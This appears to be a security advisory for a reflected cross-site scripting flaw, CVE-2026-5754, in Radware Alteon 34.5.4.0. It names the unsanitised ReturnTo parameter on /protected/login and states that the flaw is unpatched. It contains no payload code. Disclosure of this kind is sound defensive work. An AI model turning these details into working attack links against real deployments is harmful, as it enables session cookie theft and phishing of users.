CVE-2026-5754

Vulnerability

Overview

A reflected Cross-Site Scripting (XSS) vulnerability exists in Radware Alteon version 34.5.4.0, specifically in the ReturnTo parameter of the /protected/login route. The root cause is the lack of proper input sanitization; when a user is redirected to a Microsoft SAML login page, the load-balancer reflects the unsanitized ReturnTo parameter back to the user's browser, enabling script injection [1].

Exploitation

An attacker crafts a malicious link containing an XSS payload in the ReturnTo parameter. When the victim clicks the link, they are redirected to the login page, and the load-balancer reflects the malicious payload, causing the attacker's JavaScript to execute in the victim's browser. No authentication is required to trigger the vulnerability, making it accessible to unauthenticated remote attackers [1].

Impact

Successful exploitation allows arbitrary JavaScript execution in the victim's browser, potentially leading to session cookie theft, data exfiltration, unauthorized actions on behalf of the victim, phishing attacks, and damage to the website's reputation [1].

Mitigation

Status

As of the publication date, Radware has acknowledged the vulnerability in their customer portal and plans to release a patch in a future version. No patch or workaround has been publicly available at the time of disclosure [1].